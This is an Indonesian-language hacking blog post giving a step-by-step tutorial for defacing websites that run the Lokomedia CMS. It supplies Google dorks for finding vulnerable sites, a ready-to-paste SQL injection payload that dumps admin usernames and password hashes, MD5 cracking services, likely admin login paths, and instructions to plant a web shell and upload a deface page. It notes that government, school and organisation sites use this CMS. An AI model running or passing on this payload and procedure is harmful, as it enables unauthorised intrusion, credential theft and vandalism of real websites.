-->

Cara depes Cms Lokomedia

                        Palembang Cyber Team




Ok guys, daripada banyak bacot langsung aja ke tutor, tutor tentang bagaimana cara deface cms lokomedia ? what is lokomedia.
okey disini gue jelasin beberapa hal tentang lokomedia yang gue tau.
CEKIDOT

Lokomedia adalah salah satu CMS yang di gunakan oleh negara kita ini yaitu INDONESIA what kenapa indonesia? mana saya tau saya kan autis :'v

dan gasemua CMS Lokomedia itu bisa di EXPLOITASI, banyak berbagai cara attacker menyerang situs yang memiliki cms ini tak terkecuali site pemerintahan banyak site pemerintahan,organisasi,sekolah dll sebagainya memiliki cms ini, jadi tolong jika ada yang dapat bug cms ini segera lapor ke pada pihak admin atau patch sendiri, jangan asal tebas nanti pala lo gue tebas -_-

okey langsung saja bagaimana cara exploitasi nya ?
CEKIDOT

1. DORK
- inurl:/statis-1-profil.html
- inurl:/statis-2-profil.html
- inurl:/statis-3-profil.html
Sisanya Use your brain ya :*


2. Exploit
 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+


3. MD5 DECRYPTER
 https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/


TUTORIAL

1. Taro Dork yang diatas ke search engine google.

2. Pilih salah satu target kalian ok cuk.

3. Dan injek site nya dengan ca ra dibawah ini :
http://site.co.li/statis-1-profil.html kalian tambahin exploit nya sesudah angka Jadinya gini:
    http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. nanti klo vuln liat bagian title site nya ada username/password adminnya

5. Tekan CTRL + U ( laptop/pc ) kalau di HP bagaimana? tinggal ketik di url view-source:www.site.com

6. akses site https://hashkiller.co.uk/md5-decrypter.aspx ( untuk hash passwordnya yang ke encrypt )

7. Lalu cari admin login nya (sisanya use your brain)
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktu

8. lalu tanem shell kalian ( use your brain, banyak ko di google cara tanem shell )

9. kalau sudah tanem shell klik kanan shell nya, lalu klik "Copy image location"

10. Tinggal upload sc kalian  inget jangan tebas index oc dipikir gampang bikin web :3


                              -==Gatra==-

Baca juga

1 comment

Post a Comment